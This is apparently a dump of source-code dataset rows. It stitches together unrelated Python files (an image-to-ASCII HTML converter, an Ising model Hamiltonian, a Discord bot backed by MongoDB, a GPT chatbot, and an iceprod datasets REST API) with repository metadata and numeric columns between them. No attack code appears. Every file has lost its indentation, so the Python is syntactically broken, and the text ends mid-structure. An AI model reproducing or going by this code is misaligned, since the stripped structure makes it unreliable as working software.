] | null | null | null |
#! /usr/bin/python3
import sys, re
from PIL import Image
# return the argument if it exists (converted to the same type as the default), otherwise default
default = lambda arg, defa: type(defa)(sys.argv[arg]) if len(sys.argv) > arg and sys.argv[arg] else defa
# filename of image to evaluate, default is image.jpg
IMAGE = default(1, "image.jpg")
# filename of output, default just prints it to stdout
OUTPUT = default(2, "")
# choose the output function based on whether an output file was given
if OUTPUT == "": output = print
else:
def output(*args, **kwargs):
with open(OUTPUT, "w+") as ofile:
ofile.write(*args, **kwargs)
# output columns (width)
COLS = default(3, 200)
# color hues (degrees, [0-360))
COLORS = dict()
with open('colors.txt') as f:
# each line in the file
for line in f.readlines():
# means comment
if line.startswith('#'): continue
# name: hue saturation
# split between name and values
line = line.split(':')
# split values with whitespace characters
line = [line[0], *line[1].strip().split('\t')]
# strip blank things from each piece
for i, piece in enumerate(line): line[i] = piece.strip()
# add key to COLORS
name, hue, sat = line
COLORS[name] = (None if hue == '*' else int(hue), None if sat == '*' else float(sat))
# characters for lightness values (ascending)
CHARS = " -+:!?%#&$@"
# color class
class Color:
def __init__(self, r=0, g=0, b=0, name=None):
self.r, self.g, self.b = r, g, b
self.vals = ('r', 'g', 'b')
self.name = name
# reduce the color to accumulator
def reduce(self, reducer, accumulator=0):
for v in self.vals:
accumulator = reducer(accumulator, getattr(self, v))
return accumulator
# executes f for each value of this color, returns a list of results
def for_each(self, f):
return [f(getattr(self, v)) for v in self.vals]
# executes f pairwise on this and another color's values, returns list of results
def on_each(self, other, f):
return [f(getattr(self, v), getattr(other, v)) for v in self.vals]
# add with another color
def __add__(self, color2):
if type(color2) == Color:
return Color(*self.on_each(color2, lambda a, b: a + b))
else:
return Color(*self.for_each(lambda x: x + color2))
# multiply with another color
def __mul__(self, color2):
if type(color2) == Color:
return Color(*self.on_each(color2, lambda a, b: a * b))
else:
return Color(*self.for_each(lambda x: x * color2))
# subtract another color
def __sub__(self, color2):
return self + -1*color2
# divide by another color
def __truediv__(self, color2):
if type(color2) == Color:
return Color(*self.on_each(color2, lambda a, b: a / b))
else:
return Color(*self.for_each(lambda x: x / color2))
# get the difference between 2 colors (like subtraction but with no negatives)
def diff(self, color2):
return Color(*self.on_each(color2, lambda a, b: abs(a - b)))
# get the sum of the rgb values
def sum(self):
return self.reduce(lambda a, b: a + b)
# get the lightness of this color as a decimal percent
# 1 means brightest, 0 means darkest, 0.5 means middle...
def graylightness(self):
return self.sum() / 765
# returns the hsl version of this color
def hsl(self):
## setup
# normalized version of self
nself = self / 255
# rgb values
vals = nself.for_each(lambda x: x)
x, n = max(vals), min(vals) # max and min values
d = x - n # difference between max and min
## hue
hue = 0
if d == 0: pass # max and min same
elif x == nself.r: hue = 60*( (nself.g - nself.b) / d % 6 ) # r is max
elif x == nself.g: hue = 60*( (nself.b - nself.r) / d + 2 ) # g is max
else: hue = 60*( (nself.r - nself.g) / d + 4 ) # b is max
lightness = (x + n) / 2 ## lightness
saturation = 0 if d == 0 else d / (1 - abs(2*lightness - 1)) ## saturation
# add 360 to hue if it's negative
return (hue < 0)*360 + hue, saturation, lightness
# approximate a given color to be one of the colors listed in COLORS
# works by comparing hue values. lowest difference wins
def approx(self, hsl=None):
if hsl is None: hsl = self.hsl()
hue, sat = hsl[:2]
# the best one so far: (score, name, diff)
best = (None, None, None)
for name in COLORS.keys():
chue, csat = COLORS[name]
a, am, b, bm = 0, 2, 0, 2
# if hue does matter
if chue is not None: a, bm = abs(hue - chue)/360, 1
# if saturation does matter
if csat is not None: b, am = abs(sat - csat), 1
# sum of difference in hue and saturation is the score
score = a*am + b*bm
# if this is a new best score
if best[0] is None or score < best[0]:
best = (score, name)
# return the name of the best color
return best[1]
# color the string the color that the name describes
def color_str(self, string, colorName):
return f'<font color="{colorName}">{string}'
# where the output will be accumulated to
accumulator = '<body style="background-color: #000"><pre>'
# open the image
with Image.open(IMAGE) as img:
# the step to increment by each time
step = img.size[0] / COLS
# the vertical step, to account for characters not being squares
vstep = step * 15/7.81
# the current color
curcolor = None
# each row
for row in range(int(img.size[1]/vstep)):
row *= vstep
# newline character to move to the next row (the first one is swallowed inside <pre>)
accumulator += '\n'
# each column
for col in range(COLS):
col *= step
# average the colors for this location
avgcolor = Color()
colorc = 0 # color count
# within this tile/area
for y in range(int(row), int(row + vstep)):
for x in range(int(col), int(col + step)):
if x >= img.size[0]: break # break if it's out of range
# add this pixel's color to the average
avgcolor += Color(*img.getpixel((x, y)))
colorc += 1
if y >= img.size[1]: break # break if it's out of range
# turn sum into average
avgcolor /= colorc
# get the hsl version
hsl = avgcolor.hsl()
# approximate the color
apcolor = avgcolor.approx(hsl)
# pick the right character based on the lightness
char = CHARS[round(hsl[2]*(len(CHARS) - 1))]
# if it isn't already in the right color, change it
if apcolor != curcolor:
# add colored string to accumulator
accumulator += "</font>" + avgcolor.color_str(char, apcolor)
# new color
curcolor = apcolor
else:
# add character
accumulator += char
# end the elements
accumulator += "</font></pre></body>"
# output the result
output(accumulator)
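For reference, the script is driven entirely by positional arguments; a hypothetical invocation:
# Hypothetical invocation (shell):
#   ./main.py photo.jpg art.html 120
# argv[1]: input image     (default image.jpg)
# argv[2]: output file     (default: print the HTML to stdout)
# argv[3]: output columns  (default 200)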
| 37.131313
| 104
| 0.569777
| 1,043
| 7,352
| 3.985618
| 0.249281
| 0.004811
| 0.025259
| 0.016358
| 0.121482
| 0.1121
| 0.095502
| 0.095502
| 0.083474
| 0.075054
| 0
| 0.019604
| 0.320049
| 7,352
| 197
| 105
| 37.319797
| 0.811962
| 0.314608
| 0
| 0.070175
| 0
| 0
| 0.02943
| 0.010482
| 0
| 0
| 0
| 0
| 0
| 1
| 0.131579
| false
| 0.008772
| 0.017544
| 0.061404
| 0.298246
| 0.008772
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e6b5fa33d845c1a9c9c556d16d04f10c237dd56
| 3,401
|
py
|
Python
|
ising_model/hamiltonian.py
|
FeiQuantumSoftware/ising_model
|
6d8b177678aa953840fc01616dc7c789d9531b93
|
[
"BSD-3-Clause"
] | null | null | null |
ising_model/hamiltonian.py
|
FeiQuantumSoftware/ising_model
|
6d8b177678aa953840fc01616dc7c789d9531b93
|
[
"BSD-3-Clause"
] | null | null | null |
ising_model/hamiltonian.py
|
FeiQuantumSoftware/ising_model
|
6d8b177678aa953840fc01616dc7c789d9531b93
|
[
"BSD-3-Clause"
] | null | null | null |
"""coupling Hamiltonian class def"""
from math import exp
import numpy as np
from .spinconfig import SpinConfig
class Hamiltonian():
"""Create a class of Hamiltonian of 2-d Ising model.
Parameters
----------
J: float, optional
Coupling parameter, default J=-2.
u: float, optional
External field strength, default u=1.1.
Returns
-------
Hamiltonian: class
A Hamiltonian of an Ising model with J: coupling strength, u: external field factor.
Examples
--------
>>>ham = Hamiltonian(-2,1.1)
>>>ham. J
-2
"""
def __init__(self, J=-2, u=1.1):
self.u = u
self.J = J
def energy(self, spinlist):
"""Calculate the energy of a given spinconfiguration.
Parameters
----------
spinlist : list
Spin configuration represented in '1': spin up, '0': spin down.
Returns
-------
energy : float
Total energy from both the external field and the coupling between neighbor spins.
Examples
--------
>>>ham = Hamiltonian(-2,1.1)
>>>ham. energy([0,1,0,1,1])
-4.9
"""
self.spinlist = spinlist
E = 0
# Energy from the external field:
# H_external = Sum over i of u * spin[i]
for eachspin in self.spinlist:
if eachspin == 1:
E += self.u * 1
elif eachspin == 0:
E += self.u * (-1)
else:
print("Spin input error")
# Energy from coupling the nearest neighbor spin:
# H_c = -J * spin[i] * spin[i+1]
newList = self.spinlist[1:]
newList.append(self.spinlist[0])
for spinx, spiny in zip(self.spinlist, newList):
if spinx == spiny:
E += -self.J * 1
elif spinx != spiny:
E += -self.J * (-1)
else:
print("Type error spininput")
return E
def average(self, T=1, N=0):
"""Calculate the oberservables of a given spin list with N sites.
Parameters
----------
T : float, optional
Temperature of the system.
N : integer, optional
The number of sites in the spin list.
Returns
-------
E, m, C, ms : tuple
Average energy, average magnetization, heat capacity, magnetic susceptibility.
Examples
--------
>>>ham = Hamiltonian(-2,1.1)
>>>ham. average(10, 4)
(-1.894905381126034,
-0.29386784002835087,
0.17850826588133842,
0.26682385808137565)
"""
mySpin = SpinConfig(N)
Zsum = 0
E = 0
EE = 0
m = 0
mm = 0
for i in range(mySpin.iMax):
myspinlist = mySpin.input_decimal(i)
mi = mySpin.magnetization()
Ei = self.energy(myspinlist)
Zi = exp(-Ei/T)
Zsum += Zi
E += Zi * Ei
EE += Zi * Ei*Ei
m += Zi * mi
mm += Zi * mi * mi
# get average energy
E = E/Zsum
EE = EE/Zsum
# get average magnetization
m = m/Zsum
mm = mm/Zsum
# get capacity
C = (EE - E**2)/(T*T)
# get magnetic susceptibility
ms = (mm - m**2)/(T)
return E, m, C, ms
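A quick hand check of energy() against the docstring example, runnable right after the class definition:
ham = Hamiltonian(-2, 1.1)
# Field term: u * (-1 + 1 - 1 + 1 + 1) = 1.1
# Cyclic neighbour pairs (0,1),(1,0),(0,1),(1,1),(1,0): the single aligned
# pair contributes -J = 2; the four anti-aligned pairs contribute
# +J = -2 each, i.e. -8.  Total: 1.1 + 2 - 8 = -4.9.
assert abs(ham.energy([0, 1, 0, 1, 1]) - (-4.9)) < 1e-9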
| 25.007353
| 91
| 0.486622
| 397
| 3,401
| 4.151134
| 0.307305
| 0.007282
| 0.040049
| 0.041869
| 0.071602
| 0.071602
| 0.050971
| 0
| 0
| 0
| 0
| 0.057309
| 0.39459
| 3,401
| 135
| 92
| 25.192593
| 0.743079
| 0.433108
| 0
| 0.078431
| 0
| 0
| 0.022945
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.058824
| 0
| 0.176471
| 0.039216
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e7096429698d4dbcba3e4c9717842932c8154f8
| 1,363
|
py
|
Python
|
app.py
|
IamSilentBot/Guardzilla
|
8ca9dcda2d99cba1628b708a770a34dd726acd9e
|
[
"MIT"
] | 1
|
2022-02-05T22:55:50.000Z
|
2022-02-05T22:55:50.000Z
|
app.py
|
IamSilentBot/Guardzilla
|
8ca9dcda2d99cba1628b708a770a34dd726acd9e
|
[
"MIT"
] | null | null | null |
app.py
|
IamSilentBot/Guardzilla
|
8ca9dcda2d99cba1628b708a770a34dd726acd9e
|
[
"MIT"
] | 1
|
2022-02-21T17:47:39.000Z
|
2022-02-21T17:47:39.000Z
|
import nextcord
from nextcord.ext import commands
import json
import os
import pymongo
import os
from keep_alive import keep_alive
# Set environment variables
# os.environ['info'] = "test:pass123"
# os.environ['TOKEN'] = "MY-AWSOME-TOKEN"
intents = nextcord.Intents.all()
TOKEN = os.environ['TOKEN']
async def prefix_d(_, message):
f = pymongo.MongoClient(
f"mongodb+srv://{os.environ['info']}@cluster0.o0xc5.mongodb.net/myFirstDatabase?retryWrites=true&w=majority")
cluster = f["Guardzilla"]
prefix = cluster["prefix"]
prefix_x = prefix.find_one({"_id": 0})
if not prefix_x or str(message.guild.id) not in prefix_x:
prefix.delete_one({"_id": 0})
prefix.insert_one({"_id": 0, str(message.guild.id): "."})
prefix_x = prefix.find_one({"_id": 0})
if str(message.content).startswith(prefix_x[str(message.guild.id)]):
return prefix_x[str(message.guild.id)]
else:
return str(client.user.id)
client = nextcord.ext.commands.Bot(
command_prefix=prefix_d, intents=intents, help_command=None)
@client.event
async def on_ready():
print(f'{client.user} has connected to Discord!')
for pyFile in os.listdir("./commands"):
if pyFile.endswith(".py"):
client.load_extension(f"commands.{pyFile[:-3]}")
print(f"{pyFile[:-3]} | Loaded")
keep_alive()
client.run(TOKEN)
| 27.816327
| 117
| 0.681585
| 192
| 1,363
| 4.713542
| 0.427083
| 0.046409
| 0.026519
| 0.075138
| 0.108287
| 0.108287
| 0.055249
| 0.055249
| 0
| 0
| 0
| 0.010508
| 0.162142
| 1,363
| 48
| 118
| 28.395833
| 0.781961
| 0.074101
| 0
| 0.117647
| 0
| 0.029412
| 0.186804
| 0.100954
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.205882
| 0
| 0.264706
| 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e73eaef843757f7ea7a8bbd35f9c54ff770774c
| 6,878
|
py
|
Python
|
chatbot/interact.py
|
VictorDebray/RoadBuddy
|
9c62e2acd2d540caa0ebefc50af5446c0d4f864f
|
[
"MIT"
] | null | null | null |
chatbot/interact.py
|
VictorDebray/RoadBuddy
|
9c62e2acd2d540caa0ebefc50af5446c0d4f864f
|
[
"MIT"
] | null | null | null |
chatbot/interact.py
|
VictorDebray/RoadBuddy
|
9c62e2acd2d540caa0ebefc50af5446c0d4f864f
|
[
"MIT"
] | null | null | null |
# Author: DINDIN Meryll
# Date: 15 September 2019
# Project: RoadBuddy
try: from chatbot.imports import *
except ImportError: from imports import *
class Contextualizer:
def __init__(self):
try:
self._load_models()
except Exception:
drc = ['models', 'datasets']
for d in drc:
if not os.path.exists(d): os.mkdir(d)
self._download_models()
self._load_models()
def _download_models(self):
s3 = boto3.client('s3')
# Download dataset
fle = ('datasets.huggingface.co', 'personachat/personachat_self_original.json')
s3.download_file(*fle, 'datasets/persona-chat.json')
# Download model
fle = ('models.huggingface.co', 'transfer-learning-chatbot/finetuned_chatbot_gpt.tar.gz')
s3.download_file(*fle, 'models/gpt.tar.gpz')  # unpack (bucket, key) as in the dataset call above
with tarfile.open('models/gpt.tar.gpz', 'r:gz') as archive: archive.extractall('models')
# Remove tar file
os.remove('models/gpt.tar.gpz')
def _load_models(self):
self.token = OpenAIGPTTokenizer.from_pretrained('models')
self.model = OpenAIGPTLMHeadModel.from_pretrained('models')
def tokenize_personnalities(self):
with open('datasets/persona-chat.json', encoding='utf-8') as f:
dtb = json.loads(f.read())
def tokenize(obj):
if isinstance(obj, str):
return self.token.convert_tokens_to_ids(self.token.tokenize(obj))
if isinstance(obj, dict):
return dict((n, tokenize(o)) for n, o in obj.items())
return list(tokenize(o) for o in obj)
dtb = tokenize(dtb)
torch.save(dtb, 'datasets/persona-cached')
class Trigger:
def __init__(self):
self.url_jokes = 'https://icanhazdadjoke.com'
self.url_facts = 'https://some-random-api.ml/facts'
def get(self, message):
if 'joke' in message:
return requests.get(self.url_jokes, headers={"Accept":"application/json"}).json()['joke']
elif ('fun' in message) and ('fact' in message):
animal = np.random.choice(['panda', 'cat', 'dog', 'fox', 'bird', 'koala'])
return json.loads(requests.get('/'.join([self.url_facts, animal])).content)['fact']
else: return ''
class Runner:
SPECIAL_TOKENS = ["<bos>", "<eos>", "<speaker1>", "<speaker2>", "<pad>"]
def __init__(self, directory='models'):
self.hists = []
self.trigs = Trigger()
self.token = OpenAIGPTTokenizer.from_pretrained(directory)
self.model = OpenAIGPTLMHeadModel.from_pretrained(directory)
def set_background(self, characteristics):
self.perso = [self.token.convert_tokens_to_ids(self.token.tokenize(e)) for e in characteristics]
def read_background(self):
for e in self.token.decode(chain(*self.perso)): print('-', e)
def input_from_segments(self, history, reply):
bos, eos, speaker1, speaker2 = self.token.convert_tokens_to_ids(self.SPECIAL_TOKENS[:-1])
instance = {}
sequence = [[bos] + list(chain(*self.perso))] + history + [reply]
sequence = [sequence[0]] + [[speaker2 if (len(sequence)-i) % 2 else speaker1] + s for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [speaker2 if i % 2 else speaker1 for i, s in enumerate(sequence) for _ in s]
instance["mc_token_ids"] = len(instance["input_ids"]) - 1
instance["lm_labels"] = [-1] * len(instance["input_ids"])
return instance, sequence
@staticmethod
def top_filtering(logits, top_k=0, top_p=0.9, threshold=-float('Inf'), filter_value=-float('Inf')):
assert logits.dim() == 1
top_k = min(top_k, logits.size(-1))
if top_k > 0:
# Remove all tokens with a probability less than the last token in the top-k tokens
indices_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None]
logits[indices_to_remove] = filter_value
if top_p > 0.0:
# Compute cumulative probabilities of sorted tokens
sorted_logits, sorted_indices = torch.sort(logits, descending=True)
cumulative_probabilities = torch.cumsum(F.softmax(sorted_logits, dim=-1), dim=-1)
# Remove tokens with cumulative probability above the threshold
sorted_indices_to_remove = cumulative_probabilities > top_p
# Shift the indices to the right to keep also the first token above the threshold
sorted_indices_to_remove[..., 1:] = sorted_indices_to_remove[..., :-1].clone()
sorted_indices_to_remove[..., 0] = 0
# Back to unsorted indices and set them to -infinity
indices_to_remove = sorted_indices[sorted_indices_to_remove]
logits[indices_to_remove] = filter_value
indices_to_remove = logits < threshold
logits[indices_to_remove] = filter_value
return logits
def sample_sequence(self, history, min_length=1, max_length=30, temperature=0.7, current_output=None):
special_tokens_ids = self.token.convert_tokens_to_ids(self.SPECIAL_TOKENS)
if current_output is None: current_output = []
for i in range(max_length):
instance, sequence = self.input_from_segments(history, current_output)
input_ids = torch.tensor(instance["input_ids"], device='cpu').unsqueeze(0)
token_type_ids = torch.tensor(instance["token_type_ids"], device='cpu').unsqueeze(0)
logits = self.model(input_ids, token_type_ids=token_type_ids)
logits = logits[0, -1, :] / temperature
logits = self.top_filtering(logits)
probs = F.softmax(logits, dim=-1)
prev = torch.multinomial(probs, 1)
if i < 1 and prev.item() in special_tokens_ids:
while prev.item() in special_tokens_ids:
prev = torch.multinomial(probs, num_samples=1)
if prev.item() in special_tokens_ids: break
current_output.append(prev.item())
return current_output
def answer(self, message, time=4):
self.hists.append(self.token.encode(message))
with torch.no_grad(): out_ids = self.sample_sequence(self.hists)
response = self.token.decode(out_ids, skip_special_tokens=True)
response = ' '.join([response, self.trigs.get(message)])
self.hists.append(self.token.encode(response))
self.hists = self.hists[-time:]
return response
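A hypothetical conversation loop, assuming the fine-tuned GPT weights are already under models/ (see Contextualizer._download_models) and network access for the Trigger endpoints:
runner = Runner('models')
runner.set_background([
    "i am a road trip assistant.",
    "i like maps and road-side facts.",
])
print(runner.answer("hi, tell me a joke"))  # Trigger appends a dad joke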
| 38
| 126
| 0.604536
| 829
| 6,878
| 4.834741
| 0.289505
| 0.026946
| 0.041168
| 0.026198
| 0.202844
| 0.133234
| 0.062874
| 0.043912
| 0.043912
| 0
| 0
| 0.011457
| 0.276679
| 6,878
| 180
| 127
| 38.211111
| 0.794171
| 0.064117
| 0
| 0.063636
| 0
| 0
| 0.089494
| 0.033463
| 0
| 0
| 0
| 0
| 0.009091
| 1
| 0.127273
| false
| 0
| 0.018182
| 0
| 0.263636
| 0.009091
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e76f4bcaf6c2b3ef6bdb2c9d12ef79f80ffb1ec
| 13,152
|
py
|
Python
|
iceprod/server/rest/datasets.py
|
WIPACrepo/iceprod
|
83615da9b0e764bc2498ac588cc2e2b3f5277235
|
[
"MIT"
] | 2
|
2017-01-23T17:12:41.000Z
|
2019-01-14T13:38:17.000Z
|
iceprod/server/rest/datasets.py
|
WIPACrepo/iceprod
|
83615da9b0e764bc2498ac588cc2e2b3f5277235
|
[
"MIT"
] | 242
|
2016-05-09T18:46:51.000Z
|
2022-03-31T22:02:29.000Z
|
iceprod/server/rest/datasets.py
|
WIPACrepo/iceprod
|
83615da9b0e764bc2498ac588cc2e2b3f5277235
|
[
"MIT"
] | 2
|
2017-03-27T09:13:40.000Z
|
2019-01-27T10:55:30.000Z
|
import logging
import json
import uuid
from collections import defaultdict
import tornado.web
import tornado.httpclient
from tornado.platform.asyncio import to_asyncio_future
import pymongo
import motor
from rest_tools.client import RestClient
from iceprod.server.rest import RESTHandler, RESTHandlerSetup, authorization
from iceprod.server.util import nowstr, dataset_statuses, dataset_status_sort
logger = logging.getLogger('rest.datasets')
def setup(config, *args, **kwargs):
"""
Setup method for Dataset REST API.
Sets up any database connections or other prerequisites.
Args:
config (dict): an instance of :py:class:`iceprod.server.config`.
Returns:
list: Routes for dataset, which can be passed to :py:class:`tornado.web.Application`.
"""
cfg_rest = config.get('rest',{}).get('datasets',{})
db_cfg = cfg_rest.get('database',{})
# add indexes
db = pymongo.MongoClient(**db_cfg).datasets
if 'dataset_id_index' not in db.datasets.index_information():
db.datasets.create_index('dataset_id', name='dataset_id_index', unique=True)
handler_cfg = RESTHandlerSetup(config, *args, **kwargs)
handler_cfg.update({
'database': motor.motor_tornado.MotorClient(**db_cfg).datasets,
})
return [
(r'/datasets', MultiDatasetHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)', DatasetHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)/description', DatasetDescriptionHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)/status', DatasetStatusHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)/priority', DatasetPriorityHandler, handler_cfg),
(r'/datasets/(?P<dataset_id>\w+)/jobs_submitted', DatasetJobsSubmittedHandler, handler_cfg),
(r'/dataset_summaries/status', DatasetSummariesStatusHandler, handler_cfg),
]
class BaseHandler(RESTHandler):
"""
Base handler for Dataset REST API.
"""
def initialize(self, database=None, **kwargs):
super(BaseHandler, self).initialize(**kwargs)
self.db = database
class MultiDatasetHandler(BaseHandler):
"""
Handle multi-group requests.
"""
@authorization(roles=['admin','client','system','user']) #TODO: figure out how to do auth for each dataset in the list
async def get(self):
"""
Get a dict of datasets.
Params (optional):
status: | separated list of status filters
groups: | separated list of groups to filter on
users: | separated list of users to filter on
keys: | separated list of keys to return for each dataset
Returns:
dict: {<dataset_id>: metadata}
"""
query = {}
status = self.get_argument('status', None)
if status:
query['status'] = {'$in': status.split('|')}
groups = self.get_argument('groups', None)
if groups:
query['group'] = {'$in': groups.split('|')}
users = self.get_argument('users', None)
if users:
query['username'] = {'$in': users.split('|')}
projection = {'_id': False}
keys = self.get_argument('keys', None)
if keys:
projection.update({x:True for x in keys.split('|') if x})
ret = {}
async for row in self.db.datasets.find(query, projection=projection):
k = row['dataset_id']
ret[k] = row
self.write(ret)
self.finish()
@authorization(roles=['admin','user']) # anyone should be able to create a dataset
async def post(self):
"""
Add a dataset.
Body should contain all necessary fields for a dataset.
"""
data = json.loads(self.request.body)
# validate first
req_fields = {
'description': str,
'jobs_submitted': int,
'tasks_submitted': int,
'tasks_per_job': int,
'group': str,
}
for k in req_fields:
if k not in data:
raise tornado.web.HTTPError(400, reason='missing key: '+k)
if not isinstance(data[k], req_fields[k]):
r = 'key "{}" should be of type {}'.format(k, req_fields[k].__name__)
raise tornado.web.HTTPError(400, reason=r)
opt_fields = {
'priority': int,
'debug': bool,
'jobs_immutable': bool,
'status': str,
}
for k in opt_fields:
if k in data and not isinstance(data[k], opt_fields[k]):
r = 'key "{}" should be of type {}'.format(k, opt_fields[k].__name__)
raise tornado.web.HTTPError(400, reason=r)
bad_fields = set(data).difference(set(opt_fields).union(req_fields))
if bad_fields:
r = 'invalid keys found'
raise tornado.web.HTTPError(400, reason=r)
if data['jobs_submitted'] == 0 and data['tasks_per_job'] <= 0:
r = '"tasks_per_job" must be > 0'
raise tornado.web.HTTPError(400, reason=r)
elif data['tasks_submitted'] != 0 and data['tasks_submitted'] / data['jobs_submitted'] != data['tasks_per_job']:
r = '"tasks_per_job" does not match "tasks_submitted"/"jobs_submitted"'
raise tornado.web.HTTPError(400, reason=r)
# generate dataset number
ret = await self.db.settings.find_one_and_update(
{'name': 'dataset_num'},
{'$inc': {'num': 1}},
projection={'num': True, '_id': False},
upsert=True,
return_document=pymongo.ReturnDocument.AFTER)
dataset_num = ret['num']
# set some fields
data['dataset_id'] = uuid.uuid1().hex
data['dataset'] = dataset_num
if 'status' not in data:
data['status'] = 'processing'
data['start_date'] = nowstr()
data['username'] = self.auth_data['username']
if 'priority' not in data:
data['priority'] = 0.5
if 'debug' not in data:
data['debug'] = False
if 'jobs_immutable' not in data:
data['jobs_immutable'] = False
# insert
ret = await self.db.datasets.insert_one(data)
# set auth rules
url = '/auths/'+data['dataset_id']
http_client = RestClient(self.auth_url, token=self.module_auth_key)
auth_data = {
'read_groups':['admin',data['group'],'users'],
'write_groups':['admin',data['group']],
}
logger.info('Authorization header: %s', 'bearer '+self.module_auth_key)
await http_client.request('PUT', url, auth_data)
# return success
self.set_status(201)
self.set_header('Location', '/datasets/'+data['dataset_id'])
self.write({'result': '/datasets/'+data['dataset_id']})
self.finish()
class DatasetHandler(BaseHandler):
"""
Handle dataset requests.
"""
@authorization(roles=['admin','client','system','pilot'], attrs=['dataset_id:read'])
async def get(self, dataset_id):
"""
Get a dataset.
Args:
dataset_id (str): the dataset
Returns:
dict: dataset metadata
"""
ret = await self.db.datasets.find_one({'dataset_id':dataset_id},
projection={'_id':False})
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write(ret)
self.finish()
class DatasetDescriptionHandler(BaseHandler):
"""
Handle dataset description updates.
"""
@authorization(roles=['admin'], attrs=['dataset_id:write'])
async def put(self, dataset_id):
"""
Set a dataset description.
Args:
dataset_id (str): the dataset
Returns:
dict: empty dict
"""
data = json.loads(self.request.body)
if 'description' not in data:
raise tornado.web.HTTPError(400, reason='missing description')
elif not isinstance(data['description'],str):
raise tornado.web.HTTPError(400, reason='bad description')
ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
{'$set':{'description': data['description']}},
projection=['_id'])
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write({})
self.finish()
class DatasetStatusHandler(BaseHandler):
"""
Handle dataset status updates.
"""
@authorization(roles=['admin','system','client'], attrs=['dataset_id:write'])
async def put(self, dataset_id):
"""
Set a dataset status.
Args:
dataset_id (str): the dataset
Returns:
dict: empty dict
"""
data = json.loads(self.request.body)
if 'status' not in data:
raise tornado.web.HTTPError(400, reason='missing status')
elif data['status'] not in dataset_statuses:
raise tornado.web.HTTPError(400, reason='bad status')
ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
{'$set':{'status': data['status']}},
projection=['_id'])
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write({})
self.finish()
class DatasetPriorityHandler(BaseHandler):
"""
Handle dataset priority updates.
"""
@authorization(roles=['admin','system','client'], attrs=['dataset_id:write'])
async def put(self, dataset_id):
"""
Set a dataset priority.
Args:
dataset_id (str): the dataset
Returns:
dict: empty dict
"""
data = json.loads(self.request.body)
if 'priority' not in data:
raise tornado.web.HTTPError(400, reason='missing priority')
elif not isinstance(data['priority'], (int, float)):
raise tornado.web.HTTPError(400, reason='priority is not a number')
ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
{'$set':{'priority': data['priority']}},
projection=['_id'])
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write({})
self.finish()
class DatasetJobsSubmittedHandler(BaseHandler):
"""
Handle dataset jobs_submitted updates.
"""
@authorization(roles=['admin'], attrs=['dataset_id:write'])
async def put(self, dataset_id):
"""
Set a dataset's jobs_submitted.
Only allows increases, if the jobs_immutable flag is not set.
Args:
dataset_id (str): the dataset
Json body:
jobs_submitted (int): the number of jobs submitted
Returns:
dict: empty dict
"""
data = json.loads(self.request.body)
if 'jobs_submitted' not in data:
raise tornado.web.HTTPError(400, reason='missing jobs_submitted')
try:
jobs_submitted = int(data['jobs_submitted'])
except Exception:
raise tornado.web.HTTPError(400, reason='jobs_submitted is not an int')
ret = await self.db.datasets.find_one({'dataset_id':dataset_id})
if not ret:
raise tornado.web.HTTPError(404, reason='Dataset not found')
if ret['jobs_immutable']:
raise tornado.web.HTTPError(400, reason='jobs_submitted is immutable')
if ret['jobs_submitted'] > jobs_submitted:
raise tornado.web.HTTPError(400, reason='jobs_submitted must be larger than before')
if 'tasks_per_job' not in ret or ret['tasks_per_job'] <= 0:
raise tornado.web.HTTPError(400, reason='tasks_per_job not valid')
ret = await self.db.datasets.find_one_and_update({'dataset_id':dataset_id},
{'$set':{
'jobs_submitted': jobs_submitted,
'tasks_submitted': int(jobs_submitted*ret['tasks_per_job']),
}},
projection=['_id'])
if not ret:
self.send_error(404, reason="Dataset not found")
else:
self.write({})
self.finish()
class DatasetSummariesStatusHandler(BaseHandler):
"""
Handle dataset summary grouping by status.
"""
@authorization(roles=['admin','system','client','user']) #TODO: figure out how to do auth for each dataset in the list
async def get(self):
"""
Get the dataset summary for all datasets, group by status.
Returns:
dict: {<status>: [<dataset_id>,]}
"""
cursor = self.db.datasets.find(
projection={'_id':False,'status':True,'dataset_id':True})
ret = defaultdict(list)
async for row in cursor:
ret[row['status']].append(row['dataset_id'])
ret2 = {}
for k in sorted(ret, key=dataset_status_sort):
ret2[k] = ret[k]
self.write(ret2)
self.finish()
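For illustration, a minimal body accepted by MultiDatasetHandler.post: all five required fields, with tasks_submitted consistent with jobs_submitted * tasks_per_job.
import json
body = json.dumps({
    "description": "example dataset",  # str, required
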